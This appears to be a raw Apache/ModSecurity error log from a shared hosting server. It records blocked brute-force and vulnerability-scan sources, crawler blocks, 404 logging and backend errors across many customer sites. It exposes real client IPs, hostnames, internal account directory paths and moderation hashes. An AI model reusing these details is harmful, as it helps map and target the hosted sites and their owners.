[Tue May 26 15:10:44.746415 2026] [security2:error] [pid 686593:tid 686772] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqnOilgkZcvx0_tl-qAgAAALY"]
[Tue May 26 15:10:46.321536 2026] [security2:error] [pid 686593:tid 686737] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqneilgkZcvx0_tl-qPgAAAJM"]
[Tue May 26 15:10:48.348550 2026] [security2:error] [pid 686593:tid 686749] [client 14.237.39.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVqnuilgkZcvx0_tl-qcQAAAJ8"]
[Tue May 26 15:10:49.151297 2026] [security2:error] [pid 686593:tid 686741] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqoOilgkZcvx0_tl-qqQAAAJc"]
[Tue May 26 15:10:51.242949 2026] [security2:error] [pid 686593:tid 686770] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqouilgkZcvx0_tl-q7AAAALQ"]
[Tue May 26 15:10:53.456664 2026] [security2:error] [pid 686593:tid 686780] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqpeilgkZcvx0_tl-rIAAAAL4"]
[Tue May 26 15:10:54.886543 2026] [security2:error] [pid 686593:tid 686798] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqpuilgkZcvx0_tl-rTwAAANA"]
[Tue May 26 15:10:57.186993 2026] [security2:error] [pid 686593:tid 686821] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqqOilgkZcvx0_tl-rkwAAAOc"]
[Tue May 26 15:10:58.677387 2026] [security2:error] [pid 686593:tid 686846] [client 89.221.206.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqquilgkZcvx0_tl-r1AAAAQA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:10:58.766786 2026] [security2:error] [pid 686593:tid 686833] [client 14.234.47.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqquilgkZcvx0_tl-rywAAAPM"]
[Tue May 26 15:10:59.658364 2026] [security2:error] [pid 686593:tid 686775] [client 89.221.206.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqq-ilgkZcvx0_tl-r8wAAALk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 15:11:00.117619 2026] [security2:error] [pid 686593:tid 686765] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqq-ilgkZcvx0_tl-r9wAAAK8"]
[Tue May 26 15:11:02.060519 2026] [security2:error] [pid 686593:tid 686771] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqreilgkZcvx0_tl-sNAAAALU"]
[Tue May 26 15:11:03.372399 2026] [security2:error] [pid 686593:tid 686801] [client 62.60.130.228:57305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVqr-ilgkZcvx0_tl-sYAAAANM"], referer: https://www.bing.com/
[Tue May 26 15:11:03.460762 2026] [security2:error] [pid 686593:tid 686831] [client 114.119.156.165:31695] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVqr-ilgkZcvx0_tl-sawAAAPE"], referer: http://glorodavionics.com/index.php?route=affiliate/forgotten
[Tue May 26 15:11:03.704989 2026] [security2:error] [pid 686593:tid 686765] [client 62.60.130.228:59370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVqr-ilgkZcvx0_tl-scAAAAK8"]
[Tue May 26 15:11:03.971382 2026] [security2:error] [pid 686593:tid 686804] [client 89.221.206.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqr-ilgkZcvx0_tl-sfQAAANY"], referer: https://anujtradingco.com
[Tue May 26 15:11:03.999329 2026] [security2:error] [pid 686593:tid 686731] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqr-ilgkZcvx0_tl-sbgAAAI0"]
[Tue May 26 15:11:06.525078 2026] [security2:error] [pid 686593:tid 686798] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqsuilgkZcvx0_tl-svAAAANA"]
[Tue May 26 15:11:07.173138 2026] [security2:error] [pid 686593:tid 686794] [client 62.60.130.228:54199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVqs-ilgkZcvx0_tl-s0QAAAMw"]
[Tue May 26 15:11:08.348583 2026] [security2:error] [pid 686593:tid 686728] [client 43.173.173.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVqtOilgkZcvx0_tl-s8gAAAIo"]
[Tue May 26 15:11:08.555666 2026] [security2:error] [pid 686593:tid 686804] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqtOilgkZcvx0_tl-s6QAAANY"]
[Tue May 26 15:11:09.190127 2026] [security2:error] [pid 686593:tid 686651] [remote 74.7.241.58:53456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVqteilgkZcvx0_tl-tDwAAzDk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 15:11:10.931965 2026] [security2:error] [pid 686593:tid 686780] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqtuilgkZcvx0_tl-tPwAAAL4"]
[Tue May 26 15:11:12.383286 2026] [security2:error] [pid 686593:tid 686736] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqt-ilgkZcvx0_tl-tYAAAAJI"]
[Tue May 26 15:11:14.912922 2026] [security2:error] [pid 686593:tid 686810] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVquuilgkZcvx0_tl-togAAANw"]
[Tue May 26 15:11:17.205198 2026] [security2:error] [pid 686593:tid 686774] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqvOilgkZcvx0_tl-t2QAAALg"]
[Tue May 26 15:11:17.491067 2026] [security2:error] [pid 686593:tid 686729] [client 46.8.110.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqveilgkZcvx0_tl-t9AAAAIs"], referer: https://www.anujtradingco.com/
[Tue May 26 15:11:18.411790 2026] [security2:error] [pid 686593:tid 686820] [client 51.68.236.64:11771] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "veganfoodindia.com"] [uri "/robots.txt"] [unique_id "ahVqvuilgkZcvx0_tl-uDwAAAOY"]
[Tue May 26 15:11:18.411902 2026] [security2:error] [pid 686593:tid 686820] [client 51.68.236.64:11771] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "veganfoodindia.com"] [uri "/robots.txt"] [unique_id "ahVqvuilgkZcvx0_tl-uDwAAAOY"]
[Tue May 26 15:11:19.125873 2026] [security2:error] [pid 686593:tid 686810] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqvuilgkZcvx0_tl-uGwAAANw"]
[Tue May 26 15:11:19.229478 2026] [security2:error] [pid 686593:tid 686842] [client 46.8.110.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqv-ilgkZcvx0_tl-uNAAAAPw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1237908&moderation-hash=d2c8bf29b22782514f620b18e0739d0d
[Tue May 26 15:11:21.473579 2026] [security2:error] [pid 686593:tid 686799] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqweilgkZcvx0_tl-uaAAAANE"]
[Tue May 26 15:11:23.315467 2026] [security2:error] [pid 686593:tid 686812] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqwuilgkZcvx0_tl-uoAAAAN4"]
[Tue May 26 15:11:25.721306 2026] [security2:error] [pid 686593:tid 686808] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqxeilgkZcvx0_tl-u9QAAANo"]
[Tue May 26 15:11:27.890005 2026] [security2:error] [pid 686593:tid 686758] [client 123.25.163.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqx-ilgkZcvx0_tl-vSAAAAKg"]
[Tue May 26 15:11:28.127613 2026] [security2:error] [pid 686593:tid 686842] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqx-ilgkZcvx0_tl-vVAAAAPw"]
[Tue May 26 15:11:28.162377 2026] [security2:error] [pid 686593:tid 686735] [client 46.8.110.122:51963] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "46.8.110.122" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVqx-ilgkZcvx0_tl-vWwAAAJE"], referer: https://anujtradingco.com
[Tue May 26 15:11:30.204811 2026] [security2:error] [pid 686593:tid 686730] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqyeilgkZcvx0_tl-vkAAAAIw"]
[Tue May 26 15:11:30.382342 2026] [security2:error] [pid 686593:tid 686762] [client 188.130.219.222:45309] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVqyeilgkZcvx0_tl-vkQAAAKw"], referer: https://anujtradingco.com
[Tue May 26 15:11:32.178364 2026] [security2:error] [pid 686593:tid 686749] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqy-ilgkZcvx0_tl-vyQAAAJ8"]
[Tue May 26 15:11:34.179957 2026] [security2:error] [pid 686593:tid 686831] [client 185.191.171.13:42460] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahVqzuilgkZcvx0_tl-wIwAAAPE"]
[Tue May 26 15:11:34.180150 2026] [security2:error] [pid 686593:tid 686831] [client 185.191.171.13:42460] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahVqzuilgkZcvx0_tl-wIwAAAPE"]
[Tue May 26 15:11:34.322184 2026] [security2:error] [pid 686593:tid 686820] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqzeilgkZcvx0_tl-wGQAAAOY"]
[Tue May 26 15:11:36.062721 2026] [autoindex:error] [pid 686593:tid 686747] [client 43.157.172.39:34204] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:11:36.672548 2026] [security2:error] [pid 686593:tid 686763] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq0OilgkZcvx0_tl-wcQAAAK0"]
[Tue May 26 15:11:36.687397 2026] [security2:error] [pid 686593:tid 686748] [client 151.245.166.175:17401] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVq0OilgkZcvx0_tl-wZQAAAJ4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 15:11:38.459400 2026] [security2:error] [pid 686593:tid 686786] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq0uilgkZcvx0_tl-wogAAAMQ"]
[Tue May 26 15:11:40.306107 2026] [security2:error] [pid 686593:tid 686806] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq0-ilgkZcvx0_tl-w5AAAANg"]
[Tue May 26 15:11:41.868535 2026] [security2:error] [pid 686593:tid 686850] [client 88.151.33.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVq1eilgkZcvx0_tl-xEgAAAQQ"]
[Tue May 26 15:11:41.868965 2026] [security2:error] [pid 686593:tid 686785] [client 88.151.33.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVq1eilgkZcvx0_tl-xFwAAAMM"]
[Tue May 26 15:11:41.885982 2026] [security2:error] [pid 686593:tid 686822] [client 88.151.33.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVq1eilgkZcvx0_tl-xDwAAAOg"]
[Tue May 26 15:11:41.995531 2026] [security2:error] [pid 686593:tid 686784] [client 88.151.33.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVq1eilgkZcvx0_tl-xCQAAAMI"]
[Tue May 26 15:11:42.672299 2026] [core:crit] [pid 686593:tid 686782] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:11:43.053969 2026] [security2:error] [pid 686593:tid 686763] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq1uilgkZcvx0_tl-xOQAAAK0"]
[Tue May 26 15:11:45.089244 2026] [security2:error] [pid 686593:tid 686793] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq2OilgkZcvx0_tl-xhgAAAMs"]
[Tue May 26 15:11:46.108035 2026] [security2:error] [pid 686593:tid 686728] [client 45.142.154.35:57010] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVq2uilgkZcvx0_tl-xuAAAAIo"]
[Tue May 26 15:11:46.551438 2026] [security2:error] [pid 686593:tid 686738] [client 45.142.154.35:57208] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVq2uilgkZcvx0_tl-xzAAAAJQ"]
[Tue May 26 15:11:47.003863 2026] [security2:error] [pid 686593:tid 686795] [client 45.142.154.35:57362] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVq2-ilgkZcvx0_tl-x3QAAAM0"]
[Tue May 26 15:11:47.423243 2026] [security2:error] [pid 686593:tid 686829] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq2uilgkZcvx0_tl-x3AAAAO8"]
[Tue May 26 15:11:47.433106 2026] [security2:error] [pid 686593:tid 686744] [client 45.142.154.35:57514] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVq2-ilgkZcvx0_tl-x6gAAAJo"]
[Tue May 26 15:11:47.876939 2026] [security2:error] [pid 686593:tid 686783] [client 45.142.154.35:57668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVq2-ilgkZcvx0_tl-x_gAAAME"]
[Tue May 26 15:11:48.936484 2026] [security2:error] [pid 686593:tid 686765] [client 154.16.226.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVq3OilgkZcvx0_tl-yIAAAAK8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:11:49.390327 2026] [security2:error] [pid 686593:tid 686749] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq3OilgkZcvx0_tl-yJwAAAJ8"]
[Tue May 26 15:11:49.734306 2026] [core:alert] [pid 686593:tid 686759] [client 91.214.76.74:60540] /home2/debatqhn/enattafoodparcel.org/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 15:11:50.139744 2026] [lsapi:error] [pid 686593:tid 686807] [client 66.249.64.35:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 15:11:50.147707 2026] [lsapi:error] [pid 686593:tid 686786] [client 66.249.64.40:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 15:11:50.147711 2026] [lsapi:error] [pid 686593:tid 686794] [client 66.249.64.162:0] [host doyecpa.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
